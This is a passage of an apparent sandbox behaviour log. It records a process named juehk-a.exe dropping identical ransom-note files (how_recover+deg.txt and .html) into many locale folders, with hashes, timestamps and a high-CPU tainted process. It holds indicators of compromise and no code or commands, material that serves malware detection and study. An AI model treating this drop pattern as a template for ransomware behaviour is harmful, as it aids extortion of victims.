- value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942459
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75517
- mode: close
- sequenceNumber: 1127
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942459
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75528
- mode: created
- sequenceNumber: 1128
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521148
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75534
- mode: close
- sequenceNumber: 1129
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521148
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75540
- mode: created
- sequenceNumber: 1130
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521149
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75552
- mode: close
- sequenceNumber: 1131
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521149
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75557
- mode: created
- sequenceNumber: 1132
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521150
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75561
- mode: close
- sequenceNumber: 1133
- value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521150
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75566
- mode: created
- sequenceNumber: 1134
- value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521151
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75571
- mode: close
- sequenceNumber: 1135
- value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521151
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75581
- mode: created
- sequenceNumber: 1136
- value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521152
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75586
- mode: close
- sequenceNumber: 1137
- value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521152
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75621
- mode: created
- sequenceNumber: 1138
- value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521153
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75635
- mode: close
- sequenceNumber: 1139
- value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521153
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75640
- mode: created
- sequenceNumber: 1140
- value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521154
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75645
- mode: close
- sequenceNumber: 1141
- value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521154
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75654
- mode: created
- sequenceNumber: 1142
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521155
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75661
- mode: close
- sequenceNumber: 1143
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521155
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 75633
- repeat: 2000
- sequenceNumber: 1144
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 75676
- mode: created
- sequenceNumber: 1145
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521156
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75680
- mode: close
- sequenceNumber: 1146
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521156
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75685
- mode: created
- sequenceNumber: 1147
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521157
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75689
- mode: close
- sequenceNumber: 1148
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521157
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75694
- mode: created
- sequenceNumber: 1149
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521158
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75698
- mode: close
- sequenceNumber: 1150
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521158
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75737
- mode: created
- sequenceNumber: 1151
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521159
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75741
- mode: close
- sequenceNumber: 1152
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521159
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75747
- mode: created
- sequenceNumber: 1153
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231816
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75752
- mode: close
- sequenceNumber: 1154
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231816
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75758
- mode: created
- sequenceNumber: 1155
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231817
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75763
- mode: close
- sequenceNumber: 1156
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231817
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75774
- mode: created
- sequenceNumber: 1157
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942474
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75779
- mode: close
- sequenceNumber: 1158
- value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942474
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75784
- mode: created
- sequenceNumber: 1159
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231819
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75789
- mode: close
- sequenceNumber: 1160
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231819
- ntstatus: 0x0
- CreateOptions: 0x0
- high_cpu:
- timestamp: 75893
- sequenceNumber: 1161
- total_cpu: 92.647011689291105
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 92.647011689291105
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 75972
- mode: created
- sequenceNumber: 1162
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521164
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75978
- mode: close
- sequenceNumber: 1163
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521164
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75984
- mode: created
- sequenceNumber: 1164
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231821
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75988
- mode: close
- sequenceNumber: 1165
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231821
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 75994
- mode: created
- sequenceNumber: 1166
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521166
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 75998
- mode: close
- sequenceNumber: 1167
- value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521166
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76034
- mode: created
- sequenceNumber: 1168
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231823
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76040
- mode: close
- sequenceNumber: 1169
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231823
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76055
- mode: created
- sequenceNumber: 1170
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231824
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76062
- mode: close
- sequenceNumber: 1171
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231824
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76071
- mode: created
- sequenceNumber: 1172
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231825
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76079
- mode: close
- sequenceNumber: 1173
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231825
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76087
- mode: created
- sequenceNumber: 1174
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942482
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76095
- mode: close
- sequenceNumber: 1175
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942482
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76106
- mode: created
- sequenceNumber: 1176
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231827
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76114
- mode: close
- sequenceNumber: 1177
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231827
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76139
- mode: created
- sequenceNumber: 1178
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521172
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76145
- mode: close
- sequenceNumber: 1179
- value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521172
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76155
- mode: created
- sequenceNumber: 1180
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521173
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76165
- mode: close
- sequenceNumber: 1181
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521173
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76172
- mode: created
- sequenceNumber: 1182
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521174
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76179
- mode: close
- sequenceNumber: 1183
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521174
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76200
- mode: created
- sequenceNumber: 1184
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231831
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76209
- mode: close
- sequenceNumber: 1185
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231831
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76218
- mode: created
- sequenceNumber: 1186
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231832
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76223
- mode: close
- sequenceNumber: 1187
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231832
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 76229
- mode: created
- sequenceNumber: 1188
- value: C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521177
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 76243
- mode: close
- sequenceNumber: 1189
